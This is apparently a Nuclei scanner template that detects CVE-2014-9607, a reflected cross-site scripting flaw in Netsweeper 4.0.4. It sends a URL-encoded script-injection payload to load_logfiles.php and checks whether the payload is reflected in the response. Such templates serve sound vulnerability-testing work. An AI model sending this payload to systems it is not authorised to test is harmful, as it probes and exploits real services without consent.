29 lines
671 B
YAML
29 lines
671 B
YAML
|
id: CVE-2014-9607
|
||
|
|
||
|
info:
|
||
|
name: Netsweeper 4.0.4 - Cross Site Scripting Injection
|
||
|
author: daffainfo
|
||
|
severity: medium
|
||
|
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
|
||
|
tags: cve,cve2014,netsweeper,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- '"><script>alert(1)</script>'
|
||
|
part: body
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|